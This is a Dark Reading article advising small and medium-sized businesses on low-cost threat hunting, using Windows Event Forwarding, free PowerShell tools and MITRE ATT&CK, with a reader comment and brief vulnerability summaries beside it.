Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Vulnerabilities / Threats

02:30 PM
David Mashburn
David Mashburn
Connect Directly
E-Mail vvv

Threat Hunting 101: Not Mission Impossible for the Resource-Challenged

How small and medium-sized businesses can leverage native features of the operating system and freely available, high-quality hunting resources to overcome financial limitations.

Threat hunting is considered to be an essential part of modern cybersecurity operations. There are numerous benefits to this type of activity such as the proactive identification of threat actors in your environment, potentially reducing the dwell time of adversaries in your network, and the identification and resolution of benign but significant issues that can improve overall enterprise IT operations.

For resource-challenged organizations, threat hunting is often deemed mission impossible. This is not true. The benefits of threat hunting can be realized by deploying a methodical approach.

The first consideration prior to implementing threat hunting activities is the maturity of your security operations. While the thought of moving from a passive, detection-oriented posture to a hunter is an exciting prospect for many teams of defenders, it is likely that many organizations would be better off first improving their configuration management, patch management, and vulnerability management efforts, which are often challenging for organizations with dedicated teams in those functional areas.

These important processes, typically, are less mature in smaller organizations. As a result, small or resource-constrained security teams would be well served to review their operational maturity against some of the available information security guidance documentation, such as the Center for Internet Security Critical Security Controls. The CSC helps organizations prioritize security control implementation, and while threat hunting is one of the items in the CSC, it is recommended only after organizations have achieved a specific level of security operations maturity.

Onward to Threat Hunting
After demonstrating effective asset management, patch management, and vulnerability management, an organization is better suited to spin up threat-hunting efforts. Looking at the IT systems for a typical small or medium-sized organization, we often find Windows desktop in an Active Directory domain. It is also likely that there is some sort of cloud presence, most likely in the software-as-a-service area. It's in this type of environment that we can explore how some native capabilities can be leveraged to support threat-hunting efforts.

The lifeblood of threat hunting is security data. This will typically be in the form of logs, whether it is network-related data such as firewall or web proxy logs, or endpoint data from the operating system or from the endpoint security suite. To effectively hunt, data from client endpoints must be collected centrally. Given the prevalence of client-side attacks such as phishing, and the observed pattern of attack behaviors that use compromised clients to persist and move around the environment, the critical data related to adversary activity will often only be in the endpoint logs.

While the collection of endpoint logs may conjure visions of expensive SIEM solutions or yet another agent to be deployed and managed, this data collection problem has a straightforward solution. A native feature in Windows, Windows Event Forwarding, can be leveraged to solve the problem of endpoint log collection, and it is at a cost that will make management happy: zero. Managed via Group Policy, endpoints can be configured to push data to a central server. For many small organizations, a single server or even an existing low-activity server would be suitable for this data collection role.

Once this data from endpoints is centrally collected, the hunting can begin. Ideally, this data would be further consolidated into an existing SIEM or log aggregation solution to facilitate searching and correlation. However, if that option does not exist, there are projects that provide PowerShell scripts to perform analysis of this forwarded log data. One example is the DeepBlueCLI project authored by Eric Conrad, freely available on his GitHub profile. This series of scripts provides a basic set of threat-hunting capabilities by looking for evidence of malicious behavior in the endpoint log data.

Log Data and Other Indicators
If the capability does exist to roll this data into some sort of log correlation tool, then the flexibility to hunt for different indicators expands greatly. A resource such as the Mitre ATT&CK framework can be used to look for specific elements from various stages of the attack life cycle, providing a wealth of indicators to use as the basis of the hunting process. From an endpoint perspective, this methodology provides a ready way to get started with endpoint hunting in Windows event logs. However, Windows event logs are not the only source of data that can support threat hunting efforts.

Network-based data is another essential data source that can be used to find indications of adversary activity in your environment. Data such as netflow, firewall logs, proxy logs, DNS logs, and DHCP logs can all play a role in threat hunting. Collection of these log types may be more difficult in some environments due to access issues, performance overhead associated with the log generation, and the ability to effectively analyze the data source. These sources can provide a wealth of information that can show signs of threat actors, such as unusual user-agent strings, unusual data volumes or destination IP addresses, unusual client-to-client data flow for specific protocols such as SMB, odd hostnames or MAC addresses with DHCP leases, and indications of DGAs in certificate names and URLs. These are only a few of the indicators that can be used for threat hunting, but they can be highly effective components that will lead to successful hunt efforts.

Threat hunting can be effectively performed in smaller or resource-constrained environments. Leveraging native features of the operating system and using freely available, high-quality hunting resources can overcome financial limitations. Staffing constraints may be more difficult to address, but prioritization of security tasks based upon the highest value that they offer to the organization will drive the time that can be allocated to threat hunting.

If you wish to learn more about threat hunting, David Mashburn will be giving a talk on this subject "Hunting Highs and Lows: Misadventures in Threat Hunting" at SANS Pittsburgh in July, or you can research these concepts online.

Related Content:



Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry's most knowledgeable IT security experts. Check out the Interop agenda here.

David Mashburn is a SANS Certified instructor and an IT Security Manager for a global non-profit organization in the Washington, D.C. area. He has experience working as an IT security professional for several civilian federal agencies, and over 15 years of experience in IT. ... View Full Bio

Recommended Reading:

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
User Rank: Apprentice
4/16/2019 | 5:05:32 AM
Dig deeper
There are always a thousand and one ways to handle any given situation if we look far enough. We need to first take note of what the root of the problem is before drilling into possible solutions. We can never rectify the issue if we were to focus solely on the surface which is already chaotic enough.
Overcoming the Challenge of Shorter Certificate Lifespans
Mike Cooper, Founder & CEO of Revocent,  10/15/2020
7 Tips for Choosing Security Metrics That Matter
Ericka Chickowski, Contributing Writer,  10/19/2020
Register for Dark Reading Newsletters
White Papers
Current Issue
Special Report: Computing's New Normal
This special report examines how IT security organizations have adapted to the "new normal" of computing and what the long-term effects will be. Read it and get a unique set of perspectives on issues ranging from new threats & vulnerabilities as a result of remote working to how enterprise security strategy will be affected long term.
Flash Poll
How IT Security Organizations are Attacking the Cybersecurity Problem
How IT Security Organizations are Attacking the Cybersecurity Problem
The COVID-19 pandemic turned the world -- and enterprise computing -- on end. Here's a look at how cybersecurity teams are retrenching their defense strategies, rebuilding their teams, and selecting new technologies to stop the oncoming rise of online attacks.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2020-10-22
The FileImporter extension in MediaWiki through 1.35.0 was not properly attributing various user actions to a specific user's IP address. Instead, for various actions, it would report the IP address of an internal Wikimedia Foundation server by omitting X-Forwarded-For data. This resulted in an inab...
PUBLISHED: 2020-10-22
The Cosmos Skin for MediaWiki through 1.35.0 has stored XSS because MediaWiki messages were not being properly escaped. This is related to wfMessage and Html::rawElement, as demonstrated by CosmosSocialProfile::getUserGroups.
PUBLISHED: 2020-10-22
In Python 3 through 3.9.0, the Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP.
PUBLISHED: 2020-10-21
WSO2 API Manager 3.1.0 and earlier has reflected XSS on the "publisher" component's admin interface. More precisely, it is possible to inject an XSS payload into the owner POST parameter, which does not filter user inputs. By putting an XSS payload in place of a valid Owner Name, a modal b...
PUBLISHED: 2020-10-21
Adobe InDesign version 15.1.2 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious .indd file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.